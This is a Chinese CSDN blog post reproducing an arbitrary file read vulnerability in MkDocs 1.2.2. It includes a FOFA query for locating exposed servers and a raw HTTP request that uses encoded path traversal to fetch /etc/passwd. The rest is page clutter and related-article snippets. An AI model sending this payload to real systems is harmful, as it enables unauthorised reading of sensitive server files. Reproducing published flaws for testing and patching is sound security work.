Mkdocs 存在任意文件读取漏洞

已于 2023-04-24 22:57:02 修改
阅读量181 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-04-24 22:56:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/130354209
版权

文章目录

Mkdocs 存在任意文件读取漏洞

1. Mkdocs简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

MkDocs 是一个快速、简单、完全华丽的静态站点生成器,用于构建项目文档。文档源文件以 Markdown 格式编写,并使用单个 YAML 配置文件进行配置。

2.漏洞描述

mkdocs 1.2.2版本存在任意文件读取漏洞,该漏洞允许远程利用以获取敏感信息。

3.影响版本

mkdocs 1.2.2版本

4.fofa 查询语句

“mkdocs”

5.漏洞复现

漏洞数据包如下,因为浏览器编码的原因,直接访问链接不会触发漏洞,需要以数据包的形式访问:

GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:6970
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
MKdocs 任意文件读取漏洞 CVE-2021-40978
weixin_46801402的博客
11-16 333
MKdocs 任意文件读取漏洞 CVE-2021-40978
MkDocs 文档生成逻辑浅析
极光推送的专栏
02-09 903
Markdown 和 MkDocs 简介 Markdown 的语法简洁明了、学习容易,而且功能比纯文本更强,因此有很多人用它写博客。世界上最流行的博客平台 WordPress 和大型 CMS 如 Joomla 、Drupal 都能很好的支持 Markdown 。 MkDocs 是一个用于创建项目文档的快速,简单的静态站点生成器。文档源码使用 Markdown 来撰写,用一个 YAML 文件作为
MKcms漏洞合集
2401_84972893的博客
05-13 711
米酷影视管理系统是一套专为不同需求的站长而设计的影视管理系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需 3 分钟即可建立一个海量的视频讯息的行业网站。下载地址:链接:https://pan.baidu.com/s/1zJ0zDxLdblkM1DHxMZHr3w提取码:zkaq米酷影视管理系统是一套专为不同需求的站长而设计的影视管理系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需 3 分钟即可建立一个海量的视频讯息的行业网站。
MkDocs
weixin_30627341的博客
12-14 224
Overview MkDocs is afast,simpleanddownright gorgeousstatic site generator that's geared towards building project documentation. Documentation source files are written in Markdown, and configured...
谈一谈|MkDocs介绍及应用
算法与编程之美
08-16 1154
欢迎点击「算法与编程之美」↑关注我们!本文首发于微信公众号:"算法与编程之美",欢迎关注,及时了解更多此系列文章。欢迎加入团队圈子!与作者面对面!直接点击!1 什么是Mk...
Python mkdocs包的meta.py源码文件解析与使用
hongwen_han的博客
07-15 518
Python mkdocs包的meta.py源码文件解析与使用,根据meta.py提取markdown文件的meta基础信息,实现markdown文档的基础数据读取
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
Adminer≤4.6.2任意文件读取漏洞1
08-03
然而,在Adminer的某些旧版本,特别是≤4.6.2,存在一个严重的安全漏洞,允许恶意用户执行任意文件读取。 **0x02 漏洞原理** 该漏洞主要源于MySQL中的`LOAD DATA INFILE`命令的安全缺陷。`LOAD DATA INFILE`用于从...
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
漏洞简介:BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。管理功能过滤不严导致任意文件读取漏洞。##漏洞分析在文件 www\prot
mkdocs文档加密保护插件】
weixin_43891607的博客
01-10 468
mkdocs 文档加密 插件
【云原生之Docker实战】使用docker部署mkdocs项目文档工具
jks212454的博客
12-02 1194
【云原生之Docker实战】使用docker部署mkdocs项目文档工具
1.2 安装 docker 容器并配置镜像加速器
KUAILE
04-10 3062
安装 docker 容器并配置镜像加速器
哪些 Python 库让你相见恨晚?
GarfieldEr007的专栏
05-12 8340
知乎用户,A European Swallow. 苇叶、Aran He、jerry 等人赞同 补充三个有助于自动化日常工作的: sh:sh 1.08 — sh v1.08 documentation 可以用 Python 函数的语法去调用 shell 命令,sh 之于 subprocess 类似 requests 之于 urllib2。Watchdog:Watchdog — w
【python】为本地乌云漏洞库/知识库生成目录
weixin_34235371的博客
03-24 254
在网络上找到两份乌云漏洞库/知识库的离线资源。其中一份[ 密码: mat4]爬取的最后日期大概是16年2月,十个压缩包,图文并茂,唯一的缺点就是少个目录,于是写了个按照漏洞标题生成目录的脚本。另一个资源是github上的,装在虚拟机里,好处是搜索精准,坏处是占空间,占资源。我现在是用火狐打开目录,然后直接搜索相关标题,感觉也能起到相当作用,主要是方便快捷。资源挺多的,过于折腾而始终不开始学习实...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1146
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 730
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
shopxo download 任意文件读取漏洞
09-02
shopxo是一种流行的开源电商系统,以其简单易用和灵活性而备受欢迎。然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求,注入恶意代码来访问目标文件。攻击者可能可以通过执行一系列步骤来实现此目标,例如: 1. 识别目标系统上潜在的敏感文件,如数据库配置文件、用户身份验证文件等。 2. 构造特定的URL来请求这些文件,使用目标系统的下载功能。 3. 在URL中注入特殊字符或路径遍历符号,以绕过访问限制和读取目标文件。 一旦攻击者成功读取到目标文件,他们可能会进一步利用这些信息来实施其他攻击,例如窃取用户信息、篡改网站内容或者进行其他恶意活动。 为了防范shopxo download任意文件读取漏洞,网站管理员可以采取以下措施: 1. 及时更新shopxo系统以修复任何已知漏洞,并安装最新的补丁程序。 2. 限制对敏感文件的访问权限,确保只有授权的用户能够访问它们。 3. 验证和过滤用户输入,以防止任意文件读取漏洞的利用。 4. 实施Web应用程序防火墙(WAF),以监视和阻止恶意请求。 5. 定期进行安全审计和漏洞扫描,以及对服务器和应用程序配置进行安全性评估。 通过采取这些预防措施,可以最大限度地减少shopxo download任意文件读取漏洞的风险,并确保网站和用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值